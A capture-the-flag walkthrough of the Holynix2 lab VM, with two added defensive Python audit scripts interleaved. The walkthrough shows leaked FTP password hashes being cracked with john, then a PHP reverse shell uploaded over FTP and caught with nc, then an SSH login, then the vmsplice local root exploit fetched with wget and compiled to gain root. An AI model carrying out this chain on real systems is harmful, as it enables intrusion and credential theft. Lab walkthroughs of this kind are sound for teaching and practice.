rfrost:$1$3Nqexaj0$eJv5nfOYM71jvlTEA1iv..:1031:2002::/home/rfrost/./::::::::::::
ahuxley:$1$ObpCAT60$LTqCcrqMGAgv8YMyva5Sr0:1031:2002::/home/ahuxley/./::::::::::::
cmanson:$1$gMHNCq70$RCOXC8pfElSRvh5BFc5fF0:1031:2002::/home/cmanson/./::::::::::::
webmaster:$1$v2tdHOX0$MnLOX4cXqZYL99QbDDZ/1/:1031:2002::/var/www/./::::::::::::
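
Two of the steps above are file-parsing jobs that a defender also runs, in the opposite direction: picking the login-capable accounts out of /etc/passwd, and turning the Pure-FTPd password file into user:hash lines so the hash algorithm can be audited. Both files use the same colon-separated layout, so one parser serves both. The block below is an added example, not the walkthrough's formatshadow.py or any Pure-FTPd code; the passwd lines are a subset of the ones shown earlier, while the Pure-FTPd entries and their hashes are constructed (only the $1$/$6$ prefixes matter here), and the weak-algorithm list and uid threshold are assumptions.

```python
"""Audit /etc/passwd and a Pure-FTPd password file for login exposure and weak hashes."""
from collections import defaultdict

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
# Pure-FTPd: login:hash:uid:gid:gecos:home:...quota/ratio/ip fields (left blank above)
PUREFTPD_FIELDS = ("name", "hash", "uid", "gid", "gecos", "home")

NON_LOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
WEAK_ALGORITHMS = {"md5crypt", "descrypt-or-unknown"}   # assumption: what this audit treats as weak

# Subset of the /etc/passwd shown in the walkthrough.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:106:115:MySQL Server,,,:/var/lib/mysql:/bin/false
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
cmahong:x:1005:2002::/home/cmahong:/bin/false
vftp:x:1031:2002:Virtual FTP User:/dev/null:/bin/false
"""

# Constructed Pure-FTPd entries: same layout as above, placeholder hashes.
SAMPLE_PUREFTPD = """\
cmahong:$1$AAAAAAAA$bbbbbbbbbbbbbbbbbbbbbb:1031:2002::/home/cmahong/./::::::::::::
cfinnerly:$1$CCCCCCCC$dddddddddddddddddddddd:1031:2002::/home/cfinnerly/./::::::::::::
webmaster:$6$EEEEEEEE$ffffffffffffffffffffffffffffffffffffffff:1031:2002::/var/www/./::::::::::::
"""


def parse_colon_file(text, fields):
    """Split each non-empty, non-comment line on ':' and name the leading fields."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rows.append(dict(zip(fields, line.split(":")[:len(fields)])))
    return rows


def login_capable_users(passwd_text, min_uid=1000):
    """Human accounts (uid >= min_uid) whose shell allows an interactive login."""
    rows = parse_colon_file(passwd_text, PASSWD_FIELDS)
    return [r["name"] for r in rows
            if int(r["uid"]) >= min_uid and r["shell"] not in NON_LOGIN_SHELLS]


def hash_algorithm(h):
    """Name the crypt(3) scheme from the hash prefix."""
    prefixes = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
    for prefix, name in prefixes.items():
        if h.startswith(prefix):
            return name
    if h in ("", "*", "!"):
        return "locked"
    return "descrypt-or-unknown"


def pureftpd_to_john(ftp_text):
    """user:hash lines, the shape a cracker or a hash audit tool reads."""
    return [f'{r["name"]}:{r["hash"]}' for r in parse_colon_file(ftp_text, PUREFTPD_FIELDS)]


def audit_ftp_accounts(ftp_text, passwd_text):
    """Weak hash algorithms, uids shared between FTP users, and FTP users who are also SSH-capable
    (the password-reuse path the walkthrough's author tries first)."""
    rows = parse_colon_file(ftp_text, PUREFTPD_FIELDS)
    weak = [r["name"] for r in rows if hash_algorithm(r["hash"]) in WEAK_ALGORITHMS]
    by_uid = defaultdict(list)
    for r in rows:
        by_uid[r["uid"]].append(r["name"])
    shared = {uid: names for uid, names in by_uid.items() if len(names) > 1}
    ssh_users = set(login_capable_users(passwd_text))
    reused = sorted(r["name"] for r in rows if r["name"] in ssh_users)
    return {"weak_hash": weak, "shared_uid": shared, "also_ssh_login": reused}


if __name__ == "__main__":
    print("ssh-capable:", login_capable_users(SAMPLE_PASSWD))
    print(audit_ftp_accounts(SAMPLE_PUREFTPD, SAMPLE_PASSWD))
```

The john output further down confirms why md5crypt is on the weak list: thousands of candidates per second per salt is enough for a dictionary run to finish in seconds.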

Got the shadow-style file and crack it with john.

┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> ./formatshadow.py raw.txt > shadow
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john shadow --wordlist='/root/Desktop/rockyou.txt' 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 31 password hashes with 31 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Remaining 28 password hashes with 28 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 DONE (2018-01-03 14:07) 0g/s 1371p/s 38413c/s 38413C/s 87thebravery87..8570bravo
Session completed
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john shadow --show
cbergey:chatterbox1:521:500:,,,:/home/cbergey:/bin/bash
tmartin:millionaire:522:500:,,,:/home/tmartin:/bin/bash
ahuxley:bravenewworld:528:500:,,,:/home/ahuxley:/bin/bash

3 password hashes cracked, 28 left

After cracking I got 3 passwords, but I know that these 3 users don't have SSH login access, so I try FTP login. I tried all 3 logins but only found a password-protected RAR file belonging to user tmartin.

┌─[[email protected]]─[~/Desktop/Holy]
└──> ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan  3 14:14 .
drwxr-xr-x 5 root root 4096 Jan  3 14:11 ..
-rw-r--r-- 1 root root 1004 Jan  3 14:14 mystuff.rar

After thinking for a few minutes, I understood that all the usernames correspond to subdomains. OK, I need to check the subdomains again with these FTP user logins.

I need to change my name server to access the subdomains.

┌─[✗]─[[email protected]]─[~/Desktop/Holy]
└──> ping cbergey.zincftp.com
ping: cbergey.zincftp.com: Name or service not known
┌─[✗]─[[email protected]]─[~/Desktop/Holy]
└──> echo nameserver 192.168.1.88 > /etc/resolv.conf
┌─[[email protected]]─[~/Desktop/Holy]
└──> ping cbergey.zincftp.com
PING cbergey.zincftp.com (192.168.1.88) 56(84) bytes of data.
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=1 ttl=64 time=0.291 ms
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=2 ttl=64 time=0.589 ms
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=3 ttl=64 time=0.620 ms
^C
--- cbergey.zincftp.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2026ms
rtt min/avg/max/mdev = 0.291/0.500/0.620/0.148 ms

Yeah! I can access it. Now I upload a PHP file to test.

┌─[[email protected]]─[~/Desktop/Holy]
└──> ftp 192.168.1.88
Connected to 192.168.1.88.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5 allowed.
220-Local time is now 04:55. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.88:root): cbergey
331 User cbergey OK. Password required
Password:
230-User cbergey has group access to:  2002    
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful
150 Connecting to port 60441
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 .
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 ..
-rw-r--r--    1 1031     2002          220 Dec  6  2010 .bash_logout
-rw-r--r--    1 1031     2002         2940 Dec  6  2010 .bashrc
-rw-r--r--    1 1031     2002          586 Dec  6  2010 .profile
drwxr-xr-x    2 1031     2002         4096 Dec  6  2010 web
226-Options: -a -l 
226 6 matches total
ftp> cd web
250 OK. Current directory is /web
ftp> ls -al
200 PORT command successful
150 Connecting to port 37881
drwxr-xr-x    2 1031     2002         4096 Dec  6  2010 .
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 ..
226-Options: -a -l 
226 2 matches total
ftp> put info.php
local: info.php remote: info.php
200 PORT command successful
150 Connecting to port 34115
226-File successfully transferred
226 0.000 seconds (measured here), 52.51 Kbytes per second
20 bytes sent in 0.00 secs (315.0202 kB/s)
ftp> ls -al
200 PORT command successful
150 Connecting to port 54409
drwxr-xr-x    2 1031     2002         4096 Jan  3 12:56 .
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 ..
-rw-r--r--    1 1031     2002           20 Jan  3 12:56 info.php
226-Options: -a -l 
226 3 matches total

Now I upload the PHP reverse shell file.

┌─[[email protected]]─[~/Desktop/Holy]
└──> nc -lvp 3333
listening on [any] 3333 ...
connect to [192.168.1.89] from www.zincftp.com [192.168.1.88] 48950
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 05:00:25 up  2:34,  0 users,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@holynix2:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@holynix2:/$ uname -a
uname -a
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux

Yes, I check the SSH users' home directories and I find one message. Yo yo, I got the SSH login password for amckinley.

The full name is Agustin Mckinley, with 2ba9 added. Therefore the password will be agustinmckinley2ba9.

Time to log in via SSH.

┌─[[email protected]]─[~/Desktop/Holy]
└──> ssh amckinley@192.168.1.88
amckinley@192.168.1.88's password: 
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
amckinley@holynix2:~$ sudo -l
User amckinley may run the following commands on this host:
    (root) NOPASSWD: /bin/false

Success. Need to get root again! The kernel version is 2.6.22 from 2007, an old kernel.
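
Spotting "2.6.22 from 2007" by eye is how the author picks the exploit; the administrator's version of the same step is to compare the running kernel against the range a known exploit targets. The block below is an added example, not from the walkthrough or the exploit: it parses the uname line printed above and checks it against the range exploit-db entry 5092 (the vmsplice local root exploit) advertises, Linux 2.6.17 through 2.6.24.1, which is a fact about that exploit and not something the walkthrough states. The other uname strings in the driver are constructed.

```python
"""Check a kernel version string against a known-vulnerable range."""
import re

# Affected range advertised by the vmsplice exploit (exploit-db 5092): 2.6.17 <= v <= 2.6.24.1
VMSPLICE_RANGE = ((2, 6, 17), (2, 6, 24, 1))

# The uname -a line printed in the walkthrough.
BOX_UNAME = "Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux"


def parse_kernel_version(uname_line):
    """Extract the numeric kernel version (2 to 4 components) from 'uname -a' or 'uname -r' output.
    Distribution suffixes such as '-14-server' are ignored."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?", uname_line)
    if not m:
        raise ValueError("no kernel version found in: " + uname_line)
    return tuple(int(g) for g in m.groups() if g is not None)


def _pad(version, width=4):
    """Right-pad with zeros so 2.6.17 compares as 2.6.17.0."""
    return tuple(version) + (0,) * (width - len(version))


def in_range(version, low, high):
    """Inclusive comparison on zero-padded version tuples."""
    return _pad(low) <= _pad(version) <= _pad(high)


def vmsplice_exposed(uname_line):
    """True if the kernel in uname_line lies inside the range exploit 5092 targets."""
    return in_range(parse_kernel_version(uname_line), *VMSPLICE_RANGE)


if __name__ == "__main__":
    for line in (BOX_UNAME, "2.6.24.2", "4.15.0-20-generic"):   # last two constructed
        print(f"{line!r}: exposed={vmsplice_exposed(line)}")
```

A version check of this kind is only an indicator, since distributions backport fixes without changing the version number; on the box above, though, a 2007 kernel on a long-unpatched host makes the indicator the right call.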

Finally I found the right exploit to get root: https://www.exploit-db.com/exploits/5092/

amckinley@holynix2:/tmp$ wget https://www.exploit-db.com/raw/5092/ -O rootme.c --no-check-certificate
--05:25:36--  https://www.exploit-db.com/raw/5092/
           => `rootme.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 6,580 (6.4K) [text/plain]

100%[======================================================================================================>] 6,580         --.--K/s             

05:25:38 (677.66 MB/s) - `rootme.c' saved [6580/6580]

amckinley@holynix2:/tmp$ gcc rootme.c && ./a.out
rootme.c:289:28: warning: no newline at end of file
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d6e000 .. 0xb7da0000
[+] root
root@holynix2:/tmp# id
uid=0(root) gid=0(root) groups=100(users)
root@holynix2:/tmp#

Bango! I got root access. Thanks for reading. Happy Hacking.